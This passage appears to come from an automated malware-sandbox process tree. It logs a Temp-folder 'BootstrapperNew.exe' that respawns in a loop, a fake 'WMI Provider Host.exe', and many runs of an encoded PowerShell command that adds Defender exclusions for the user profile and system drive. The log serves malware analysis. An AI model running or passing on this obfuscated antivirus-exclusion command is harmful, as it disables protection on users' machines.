        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        34⤵
        
        PID:6064
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        34⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        34⤵
        
        PID:6796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        35⤵
        
        PID:6988
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        35⤵
        
        PID:7052
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        35⤵
        
        PID:6784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        36⤵
        
        PID:6812
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        36⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        36⤵
        
        PID:6840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        37⤵
        
        PID:5164
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        37⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        37⤵
        
        PID:4684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        38⤵
        
        PID:3904
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        38⤵
        
        PID:384
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        38⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        39⤵
        
        PID:668
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        39⤵
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        39⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        40⤵
        
        PID:2108
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        40⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        40⤵
        
        PID:6376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        41⤵
        
        PID:4212
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        41⤵
        
        PID:1348
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        41⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        42⤵
        
        PID:1016
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        42⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        42⤵
        
        PID:3688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        43⤵
        
        PID:6424
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        43⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        43⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        44⤵
        
        PID:788
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        44⤵
        
        PID:4572
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        44⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        45⤵
        
        PID:2248
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        
        PID:4224
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        45⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        45⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        46⤵
        
        PID:4008
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        46⤵
        
        PID:656
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        46⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        47⤵
        
        PID:2128
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        47⤵
        
        PID:1292
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        47⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        48⤵
        
        PID:5448
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:1644
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        48⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        48⤵
        
        PID:3656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        49⤵
        
        PID:5724
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        49⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        49⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        50⤵
        
        PID:3452
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        50⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        50⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        51⤵
        
        PID:4240
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        51⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        51⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        52⤵
        
        PID:3656
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        52⤵
        
        PID:5668
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        52⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        53⤵
        
        PID:6452
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        53⤵
        
        PID:5352
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        53⤵
        
        PID:3776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        54⤵
        
        PID:6516
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        54⤵
        
        PID:6000
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        54⤵
        
        PID:968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        55⤵
        
        PID:6208
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        55⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        55⤵
        
        PID:6236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        56⤵
        
        PID:4004
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        56⤵
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        56⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        57⤵
        
        PID:2852
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        57⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        57⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        58⤵
        
        PID:6928
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        58⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        58⤵
        
        PID:6956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        59⤵
        
        PID:5920
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        59⤵
        
        PID:7112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        59⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        60⤵
        
        PID:6400
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        60⤵
        
        PID:6180
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        60⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        61⤵
        
        PID:6348
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        61⤵
        
        PID:7080
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        61⤵
        
        PID:1744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
